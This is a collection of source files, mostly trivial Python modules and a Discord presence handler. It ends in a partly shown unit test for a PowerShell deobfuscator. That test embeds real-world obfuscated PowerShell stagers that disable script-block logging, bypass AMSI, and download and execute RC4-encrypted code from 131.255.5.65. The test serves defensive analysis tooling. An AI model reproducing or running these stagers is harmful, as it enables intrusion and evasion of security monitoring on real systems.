28b3b666936fc41c4051c7821a66cb8922aa6144 | 45 | py | Python | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | 2 | 2022-03-17T08:08:07.000Z | 2022-03-17T21:38:54.000Z | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | null | null | null | droput_authentication/droput_auth/config/__init__.py | hosein-yousefii/DROPUT | 99a714f03a92b14228a3691ca6568ece0f0ea48c | [
"Apache-2.0"
] | null | null | null | from droput_auth.config.config import Config
| 22.5 | 44 | 0.866667 | 7 | 45 | 5.428571 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
28caf7771b7f75c0ee86fac9feba525e527bfa65 | 66 | py | Python | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | modes/left_cannon/code/left_cannon.py | GabeKnuth/STTNG | d9de356a72ca3850cc710e4c413a932450062a8a | [
"MIT"
] | null | null | null | from mpf.system.modes import Mode
class kickback(Mode):
pass
| 13.2 | 33 | 0.742424 | 10 | 66 | 4.9 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 4 | 34 | 16.5 | 0.907407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
e93dd2c9198db885f95278594ee42ae6c3e19265 | 74 | py | Python | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | src/utils/metadata/__init__.py | SecureThemAll/cb-repair | 3d1d4422e9a9ab459641e1ca759e3b73887d2950 | [
"MIT"
] | null | null | null | from .manifest import *
from .snippet import *
from .source_file import *
| 18.5 | 26 | 0.756757 | 10 | 74 | 5.5 | 0.6 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 74 | 3 | 27 | 24.666667 | 0.887097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3aa5de4a87d58d7334aaf29bf1e7f67e21c8098e | 21 | py | Python | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 2 | 2019-12-17T03:38:38.000Z | 2021-05-28T06:23:58.000Z | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 8 | 2021-05-09T06:05:46.000Z | 2022-03-02T09:53:20.000Z | reinvent-2019/rhythm-cloud/lib/ABElectronics_Python_Libraries/ADCPi/__init__.py | kienpham2000/aws-builders-fair-projects | 6c4075c0945a6318b217355a6fc663e35ffb9dba | [
"Apache-2.0"
] | 3 | 2020-09-30T18:46:59.000Z | 2020-10-21T21:20:26.000Z | from .ADCPi import *
| 10.5 | 20 | 0.714286 | 3 | 21 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 1 | 21 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3ac0b459b5fe63ea8165259c2b617c8546c0db91 | 3,444 | py | Python | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | 1 | 2020-05-16T23:38:20.000Z | 2020-05-16T23:38:20.000Z | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | null | null | null | handler.py | garrettsummerfi3ld/adobe-rpc | 5084a44d924573ffd9650f2e969d51d5bced486f | [
"MIT"
] | null | null | null | import sys
import logging
def get_rpc_update():
# Grabs data from applications
logging.debug("Checking OS...")
if sys.platform in ['Windows', 'win32', 'cygwin']:
# Windows data retrieval
try:
logging.debug("Importing Windows specific modules...")
from api.windows import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info != None:
# Information to publically show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info == None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"Required dependency is not found! Did install all dependencies? Check with the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
elif sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
# macOS data retrieval
try:
logging.debug("Importing macOS specific modules...")
from api.macos import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info != None:
# Information to publically show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info == None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"Required dependency is not found! Did install all dependencies? Check with the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
else:
logging.error("Unknown operating system! Exiting...")
logging.error("If you believe this is an error. Submit a bug report.")
raise SystemExit(0)
def exception_handler(exception, future):
logging.exception("Something bad happened. Printing stacktrace...") | 42 | 104 | 0.570557 | 360 | 3,444 | 5.283333 | 0.313889 | 0.073607 | 0.044164 | 0.033649 | 0.771819 | 0.771819 | 0.732913 | 0.732913 | 0.732913 | 0.732913 | 0 | 0.003095 | 0.343206 | 3,444 | 82 | 105 | 42 | 0.837754 | 0.149826 | 0 | 0.714286 | 0 | 0 | 0.257456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aae805c822d00cc4905f52f3ee9996134cc8d830 | 73 | py | Python | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | chosen/forms.py | TBP-IT/django-chosen | a64821251aabdbf95cdb8102bedf1a5574ee29d6 | [
"BSD-2-Clause"
] | null | null | null | # flake8: noqa
from chosen.fields import *
from chosen.widgets import *
| 14.6 | 28 | 0.753425 | 10 | 73 | 5.5 | 0.7 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 0.164384 | 73 | 4 | 29 | 18.25 | 0.885246 | 0.164384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aaf7cca4331195b9cf218be816102104f6471918 | 132 | py | Python | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | app/admin/__init__.py | SuYehTarn/CS651-Group8-Feedback_Forum | d1163442aea81214c4dfa8de1d353ec719bfa7ab | [
"MIT"
] | null | null | null | """Module of the Admin blueprint
"""
from flask import Blueprint
admin = Blueprint('admin', __name__)
from app.admin import views
| 16.5 | 36 | 0.75 | 18 | 132 | 5.277778 | 0.611111 | 0.294737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 132 | 7 | 37 | 18.857143 | 0.848214 | 0.219697 | 0 | 0 | 0 | 0 | 0.052083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
c91fa8b4f6b178ccaac389e739fe344201ef7d75 | 16,050 | py | Python | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | 1 | 2022-02-13T20:57:15.000Z | 2022-02-13T20:57:15.000Z | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | null | null | null | test/units/obfuscation/ps1/test_format.py | bronxc/refinery | 9448facf48a0008f27861dd1a5ee8f5218e6bb86 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ... import TestUnitBase
class TestFormatString(TestUnitBase):
def setUp(self):
super().setUp()
self.unit = self.load()
def test_split_format_string(self):
self.assertEqual(self.unit(BR'''"{0}$SEP{1}"-f 'Hello',"World"'''), B'"Hello${SEP}World"')
def test_invalid_format(self):
data = BR'''"{0}{2}{1}"-f 'Hello',"World"'''
self.assertEqual(self.unit(data), data)
def test_trivial(self):
self.assertEqual(self.unit(BR""""{0}{2}{1}"-f 'signa','ures','t'"""), b'"signatures"')
def test_all_single_quotes(self):
self.assertEqual(self.unit(BR"""'{0}{2}{1}'-f 'signa','ures','t'"""), b'"signatures"')
def test_mixed_quotes(self):
self.assertEqual(self.unit(BR'''"{0}{2}{1}"-f 'signa','ures',"t"'''), b'"signatures"')
def test_format_string_with_chars(self):
self.assertEqual(self.unit(b'("{0}na{2}{1}"-f \'sig\',\'ures\',\'t\')'), b'("signatures")')
def test_real_world_01(self):
self.assertIn(b'http://131.255.5.65:80', self.unit(
BR''' ( [TYPE]("{3}{14}{2}{6}{7}{10}{11}{1}{9}{5}{4}{0}{12}{13}{8}"-F'nG,sys','RY[','nS.','CoLL','I','TR','Ge','nErIc.d','bjECt','s','iCT','ioNa','TEM.','o','eCtIo') ) ; .("{1}{2}{0}" -f 'TEm','Set','-i') ("{2}{0}{1}" -f 'iABle:jHGs','0','Var') ([TYPE]("{3}{0}{2}{1}"-f'CrI','K','PTBLOc','s') ) ; ^&("{1}{0}{2}"-f 'Et','S','-iTem') ("{0}{3}{2}{1}"-f 'VariA','0','E:e8','bL') ([TyPe]("{1}{0}"-F'F','RE')); ${1`6j9}=
[typE]("{2}{6}{8}{4}{7}{0}{5}{3}{1}"-f'Nt','GEr','system.N','aNa','ERViC','M','et.','epoI','S') ; ${3`sR2} = [TYpE]("{2}{0}{3}{1}"-F 'STeM.NeT.W','equESt','SY','ebR') ; .('sv') ("{0}{1}" -f'dt37m','b') ( [tyPe]("{4}{6}{0}{1}{5}{3}{2}"-f'M.neT.Cr','eD','e','CAch','Sy','EnTIaL','ste') ) ; .("{0}{1}" -f'se','t') ('Ut2'+'i') ( [TYPE]("{4}{3}{2}{0}{1}"-f'm.TEXT.ENcODi','nG','e','T','SYS') ); IF(${ps`VE`RsIoNtab`LE}."PsV`E`Rsi`On"."MaJ`OR" -GE 3){${G`Pf}= ( ^&("{3}{0}{1}{2}" -f'Et-VA','Ria','bLE','g') ("{1}{0}"-f'0','E8') -VALUEonLy )."ass`eM`BlY".("{2}{0}{1}" -f'TTY','Pe','GE').Invoke(("{1}{3}{6}{2}{4}{0}{5}" -f'on.Ut','Syst','to','em.Managem','mati','ils','ent.Au'))."GETFiE`ld"(("{2}{3}{4}{0}{1}{5}"-f 'cyS','ettin','c','ac','hedGroupPoli','gs'),'N'+("{4}{2}{1}{0}{3}" -f'ublic,S','P','n','tatic','o'));If(${G`Pf}){${G`Pc}=${g`pf}.("{0}{1}" -f 'G','ETVAlue').Invoke(${n`Ull});If(${g`pc}[("{0}{2}{1}" -f'Scri','tB','p')+("{2}{1}{0}"-f 'ing','ckLogg','lo')]){${G`PC}[("{1}{0}" -f 'ptB','Scri')+("{2}{0}{1}"-f 'kLoggi','ng','loc')][("{3}{1}{0}{2}" -f'p','leScri','tB','Enab')+("{1}{0}{2}" -f 'gin','lockLog','g')]=0;${G`Pc}[("{1}{0}"-f'ptB','Scri')+("{1}{0}{2}"-f'ckLog','lo','ging')][("{0}{5}{7}{4}{2}{1}{6}{3}" -f 'En','nvoc','lockI','gging','ptB','able','ationLo','Scri')]=0}${v`Al}= ${Zh`ex}::("{1}{0}" -f 'eW','n').Invoke();${v`Al}.("{0}{1}" -f'Ad','D').Invoke(("{3}{1}{2}{0}" -f'riptB','bl','eSc','Ena')+("{3}{1}{2}{0}"-f'ng','c','kLoggi','lo'),0);${V`Al}.("{1}{0}"-f'd','Ad').Invoke(("{4}{5}{6}{1}{3}{2}{7}{0}"-f 'ing','ockInv','catio','o','EnableS','cr','iptBl','nLogg'),0);${G`pc}[((("{19}{1}{21}{22}{4}{3}{16}{24}{8}{17}{11}{10}{7}{18}{20}{6}{5}{12}{23}{9}{14}{15}{13}{2}{0}" -f 'B','Y','pt','EZ1m','_MACHIN','sZ1','1mWindow','i','areZ1mPolic','l','1mM','esZ','m','cri','lZ','1mS','S','i','crosof','HKE','tZ','_','LOCAL','PowerShe','oftw')) -CrePLAcE ([chAr]90+[chAr]49+[chAr]109),[chAr]92)+("{0}{3}{1}{2}"-f 'lo','ggin','g','ckLo')]=${V`AL}}ELse{ ( ^&("{0}{2}{3}{1}"-f 'gEt-','IAbLE','v','AR') ("{1}{0}" -f'gS0','jH') -va )."GEtFiE`Ld"(("{0}{2}{1}"-f 'signa','ures','t'),'N'+("{0}{1}{2}{3}" -f'on','Public,S','ta','tic')).("{1}{0}{2}" -f 'TVa','SE','lue').Invoke(${nu`lL},(^&("{1}{0}{3}{2}" -f'Ew-','N','Ect','OBJ') ("{9}{6}{7}{1}{0}{4}{8}{3}{5}{2}" -f'eR','N','InG]','hSE','iC.HA','t[str','olLe','cTiONS.GE','S','C')))} ( ^&("{0}{1}" -f 'VAR','IAbLe') ("{1}{0}" -f'80','e'))."VAl`Ue"."aSSe`m`BLY".("{1}{2}{0}" -f'Pe','GETT','y').Invoke(("{7}{6}{2}{3}{9}{5}{1}{4}{0}{8}{10}" -f'on.Amsi','omat','ge','m','i','t','a','System.Man','Uti','ent.Au','ls'))^|.('?'){${_}}^|^&('%'){${_}.("{1}{0}{2}"-f 'FIEL','GEt','D').Invoke(("{3}{0}{1}{2}{4}"-f 'In','itFai','l','amsi','ed'),("{0}{2}{1}"-f'No','ic','nPublic,Stat')).("{0}{2}{1}" -f'S','VALUe','eT').Invoke(${N`Ull},${T`RuE})};}; ( ^&("{1}{0}"-f 'm','Ite') ("v"+"Ar"+"IabLe:"+"16J9") )."v`ALue"::"E`xpe`Ct100`c`onti`Nue"=0;${Wc}=^&("{1}{2}{0}"-f 'T','NeW-','Objec') ("{5}{4}{0}{2}{6}{1}{3}"-f'WebC','n','L','T','NEt.','SYstEm.','ie');${u}=("{13}{0}{3}{1}{5}{10}{16}{2}{8}{12}{4}{6}{7}{11}{9}{15}{14}" -f'ozilla/',' (Wi','s ','5.0',';','n',' rv:1','1.0) ','NT 6.1; WOW64;','ke G','d','li',' Trident/7.0','M','ko','ec','ow');${Wc}."HEA`deRs".("{1}{0}"-f 'DD','A').Invoke(("{1}{0}{2}" -f'r-Age','Use','nt'),${u});${wC}."pR`oXY"= ( ^&("{2}{0}{1}"-f 'iAb','le','GET-vaR') ("3"+"Sr2") )."va`lUe"::"Defa`U`Ltweb`PrOxy";${WC}."p`ROXy"."CR`E`dEnTI`AlS" = ( ^&("{2}{1}{0}" -f 'teM','di','Chil') ("{1}{3}{2}{0}"-f'mb','varIaBLE:','T37','d') )."V`Alue"::"dEfA`UL`TNeT`Wo`RKcredentiAls";${SC`R`ipT`:`PRoxy} = ${wc}."P`RoXy";${K}= (^&("{0}{1}" -f 'va','riabLe') ('Ut2'+'i') )."v`ALuE"::"a`SCIi".("{1}{2}{0}" -f'ES','G','ETBYT').Invoke(("{5}{1}{4}{0}{3}{2}" -f'c7aa','9acd','9ac5cd9c','0','1811','aede680d435'));${r}={${D},${k}=${aR`GS};${S}=0..255;0..255^|^&('%'){${j}=(${J}+${s}[${_}]+${K}[${_}%${k}."cou`NT"])%256;${S}[${_}],${S}[${J}]=${S}[${J}],${S}[${_}]};${d}^|.('%'){${I}=(${i}+1)%256;${H}=(${h}+${S}[${i}])%256;${s}[${I}],${S}[${h}]=${S}[${h}],${s}[${I}];${_}-bXOR${s}[(${s}[${i}]+${s}[${h}])%256]}};${S`eR}=("{4}{3}{2}{1}{5}{0}"-f '5:80','31.255','//1',':','http','.5.6');${t}=("{3}{0}{2}{1}" -f 'min/ge','p','t.ph','/ad');${Wc}."He`ADErs".("{1}{0}"-f'D','AD').Invoke(("{0}{2}{1}"-f'C','okie','o'),("{4}{2}{1}{0}{5}{3}{6}"-f 'P','=9lSc2HiKKJ0','sion','cFj6vBQukc','ses','j','ypvg='));${D`Ata}=${wC}.("{2}{0}{1}"-f 'aD','DATa','DOWnLo').Invoke(${S`ER}+${t});${i`V}=${da`Ta}[0..3];${D`Ata}=${D`AtA}[4..${D`Ata}."leN`GTH"];-JoIN[CHaR[]](^& ${r} ${d`ATa} (${iv}+${K}))^|.("{1}{0}" -f 'X','IE')'''
))
def test_real_world_02(self):
payload = B'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'
self.assertIn(payload, self.unit(
BR''' "\"(.("{1}{2}{0}" -f 'T','nE','W-objec') ("{6}{5}{0}{3}{2}{8}{1}{7}{4}" -f 'I', 'e', 'cOMPRESSION.', 'o.', 'TEsTREam', 'Ystem.', 'S', 'Fla', 'd')( [syStEm.Io.mEmorYstREam] [cONVeRt]::"Fr`om`BasE6`4sT`RiNg"(("{9}{41}{37}{28}{2}{92}{89}{75}{40}{33}{58}{94}{1}{17}{52}{49}{93}{59}{54}{64}{63}{45}{36}{70}{66}{15}{13}{22}{12}{65}{39}{61}{10}{7}{81}{87}{29}{95}{96}{79}{23}{44}{18}{71}{42}{20}{24}{82}{25}{69}{38}{30}{5}{0}{88}{97}{77}{78}{67}{55}{27}{62}{84}{48}{76}{90}{80}{21}{74}{31}{16}{56}{43}{47}{35}{11}{73}{72}{83}{19}{98}{57}{50}{53}{85}{32}{51}{46}{91}{6}{34}{26}{60}{4}{86}{8}{14}{3}{68}"-f
'A5WT4Ysfzc','9qMq2pivVle3JZbbOIhBeFCyVDVxqqJvQkMViBROixQTBBEMga','4xVg3fZ78OUR9V8','X377s08+/PP7zeP348y/Tl0+P18','Z5TiLVA39KotEnX8m9JX/F2JO4awWO6','NIzLZMqznSDYjZsoP2Nr','+','BoYnCuEIfgVcnQyhezoy8RWTbgJDd3bnrDaUEYNHOsaiaNHYi0qJY3kdL7t','rXS0t3GdynTydk1V2TJd2anb','PZhbq+XGFYT/yn4wOefgxPS9g99ELshBxCYTUGAY9OAIWTDYMBz0kui/p77qPXnYsC+t7nWpqlW9H797vD6++TD/5fNy/vlj/PSt3u+flx/+/THmT9++/OvlTb+/Pl5KuGrYSzhjbGssdY6pr7U','nYbNCqyWgyTkLKcbshQVKGkSlFJKKP4lctGY7pV09RGmcBk9xOEfPrw9DUerU7aWnugknEHM','FwsjnxX','pEzOlhHQRv8IIEqQXycLCL+KGMtDzM0CvFxaLRVOmoasW','qPdOF2wglcTS4pcEh9GeqSh+zBvtS3UVfVDoWriXMOM72HFbIZl3RK6FK0JwDOU','KA9f48t2Hnz7/8M/Xl2s7pn2+l/V8eXv89/H','Q1p57l3CANSBlwdATNVj6VA92WbWnPwpgwm','Kp0ZqXIeMBDbnGhUo+GeY/wRrNRMi9GOj2','zPMO','z2ZNUgZi56','4wa8yHapYhvCWOAUvRgh3mat6TFlriK2i77VeEM3cBlVetPTe1E/cf5meCXnVUAP+PoUP1zbNxGWPygkzYxVCIak93mhJjLv9IH1fjZgd','mRgS3boLFcAgA','6tC4ecVgmY6A0LTMhqsFxLe+cxNJzkZLj','ElBW+PKk6','QacEfD2Va77NzwJrdQSTt850MI','N','fNc9WB05PN0egBR0oNgGVQ9y375QY9MY3RxH','GHPa6o005sv3HbIduw19RcFUFymUs7q4yWX/e7P7Kt7HPwDVfzkcvqwFcNuZ0x7